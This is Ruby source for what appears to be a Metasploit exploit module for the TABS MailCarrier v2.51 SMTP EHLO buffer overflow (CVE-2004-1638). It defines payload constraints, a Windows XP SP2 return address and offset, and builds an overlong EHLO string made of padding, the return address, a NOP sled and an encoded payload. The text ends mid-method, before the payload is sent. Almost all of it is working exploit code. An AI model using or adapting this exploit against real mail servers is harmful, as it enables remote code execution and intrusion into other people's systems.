def initialize(info = {})
  # Public references for the MailCarrier v2.51 SMTP EHLO overflow this
  # module describes (CVE, OSVDB and BID ids plus the exploit-db write-up).
  references = [
    [ 'CVE', '2004-1638' ],
    [ 'OSVDB', '11174' ],
    [ 'BID', '11535' ],
    [ 'URL', 'http://www.exploit-db.com/exploits/598' ],
  ]

  # Payload constraints handed to the framework: maximum payload size,
  # byte values the encoder must keep out of the payload, and the stack
  # pointer adjustment applied before the payload runs.
  payload_opts = {
    'Space' => 1000,
    'BadChars' => "\x00\x0a\x0d\x3a",
    'StackAdjustment' => -3500,
  }

  # Target table: a single entry carrying the return address and the
  # EHLO argument length for Windows XP SP2 (EN).
  targets = [
    [ 'Windows XP SP2 - EN', { 'Ret' => 0x7d17dd13, 'Offset' => 5093 } ],
  ]

  # Merge the module metadata into the info hash supplied by the framework
  # and pass the result up to the parent exploit class.
  module_info = update_info(info,
    'Name' => 'TABS MailCarrier v2.51 SMTP EHLO Overflow',
    'Description' => %q{
      This module exploits the MailCarrier v2.51 suite SMTP service.
      The stack is overwritten when sending an overly long EHLO command.
    },
    'Author' => [ 'Your Name' ],
    'Arch' => [ ARCH_X86 ],
    'License' => MSF_LICENSE,
    'Version' => '$Revision: 7724 $',
    'References' => references,
    'Privileged' => true,
    'DefaultOptions' => { 'EXITFUNC' => 'thread' },
    'Payload' => payload_opts,
    'Platform' => ['win'],
    'Targets' => targets,
    'DisclosureDate' => 'Oct 26 2004',
    'DefaultTarget' => 0)
  super(module_info)

  # User-settable options: the SMTP port (default 25) and LHOST, which the
  # original author notes is required for the stack offset.
  register_options(
    [
      Opt::RPORT(25),
      Opt::LHOST(), # Required for stack offset
    ], self.class)
end
def exploit
connect
sploit = "EHLO "
sploit << rand_text_alpha_upper(target['Offset'])
sploit << [target['Ret']].pack('V')
sploit << make_nops(32)
sploit << payload.encoded